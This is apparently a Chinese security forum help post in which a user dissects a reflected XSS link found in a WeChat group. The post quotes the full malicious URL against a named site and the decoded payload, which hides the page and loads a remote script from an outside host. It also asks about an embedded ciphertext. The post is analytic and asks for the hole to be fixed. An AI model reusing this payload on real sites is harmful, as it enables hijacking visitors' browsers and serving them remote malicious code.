-
-
未解决
[求助]一个xss攻击样本中,代码的作用求解
-
发表于:
2020-11-16 09:51
1619
-
未解决 [求助]一个xss攻击样本中,代码的作用求解
在微信群里看到一个连接,链接:
1 | https://www.qufair.com/public/login/pintb/daqin33?ref=https%3A%2F%2Fwww.qufair.com%2Fconvention%2F5880.shtml520%27%7D)%7D;new%20Function(atob(%60ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7di5zcmM9Ii8vejIuZHVveGouY29tL3giK3dpbmRvdy5sb2NhdGlvbi5zZWFyY2g7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw%60))();if(0)%7B$(%7B//&U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=
|
第一部分 创建个函数然后跳转
1 2 3 4 5 6 7 | (function anonymous() {
document.documentElement.hidden=1;
v=document.createElement("script");
v.src="//z2.duoxj.com/x"+window.location.search;
document.head.appendChild(v);
throw 0
})
|
但是第二部分中
1 | if(0){$({//&U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=
|
按我理解是一个不调用的闭合函数, 但中间有段aes加密的密文
1 | U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=
|
求教这个干嘛用的,有点逼死强迫症的感觉
(地址没隐藏,希望能联系上这个站点管理员的让补下漏洞吧)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
